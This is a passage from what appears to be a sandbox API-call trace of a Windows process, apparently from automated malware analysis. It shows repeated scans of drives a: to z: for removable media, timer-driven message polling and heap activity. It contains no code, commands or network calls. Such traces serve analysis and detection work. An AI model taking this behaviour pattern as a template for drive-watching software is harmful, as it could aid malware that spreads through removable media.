0x14bd358 [0218.130] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0218.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0218.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.130] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.131] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.131] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.131] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.131] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.131] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.131] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.132] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.132] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.133] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.133] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.133] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.134] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.134] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.134] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.134] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.134] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.135] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.135] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.135] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.135] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.136] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.136] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.136] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.136] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.136] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.137] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0218.137] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0218.137] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.137] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0218.137] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.137] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.138] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0218.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325dc0 [0218.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.138] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.138] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.138] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325dc0 | out: hHeap=0x12c0000) returned 1 [0218.138] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.139] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0218.139] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0218.139] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.139] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0218.139] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.139] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0218.139] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.139] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.139] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0218.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.140] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.140] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.140] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.140] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.140] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.140] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.140] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0218.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318de0 [0218.141] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.141] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.141] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.141] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.142] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.142] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.142] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.142] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.142] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.143] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.143] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.143] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.143] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.143] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.144] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.144] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.144] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.144] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.145] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.145] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.145] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.145] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.145] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.146] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.146] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.147] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.147] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.147] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.147] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.148] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.148] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.148] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.148] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.148] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.148] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0218.148] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.148] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0218.148] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.148] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.148] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.148] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.149] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.149] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.149] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.149] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.149] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0218.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326020 [0218.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326020 | out: hHeap=0x12c0000) returned 1 [0218.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0218.150] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0218.150] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318de0 | out: hHeap=0x12c0000) returned 1 [0218.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0218.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.151] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.151] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.151] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0218.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.151] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0218.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0218.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.152] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0218.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0218.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.152] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.152] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.152] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.152] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.152] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.153] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.153] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.153] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.153] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.153] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.153] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.154] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.154] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.154] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.154] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.154] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.155] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.155] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.156] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.157] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.157] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.157] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.157] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.158] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.158] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.166] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.167] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.167] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.167] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.167] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.167] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0218.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.168] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.168] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.168] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.168] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.168] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.169] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0218.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0218.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325ea0 [0218.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325ea0 | out: hHeap=0x12c0000) returned 1 [0218.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0218.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0218.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0218.170] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0218.170] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.170] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.170] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0218.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.170] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: 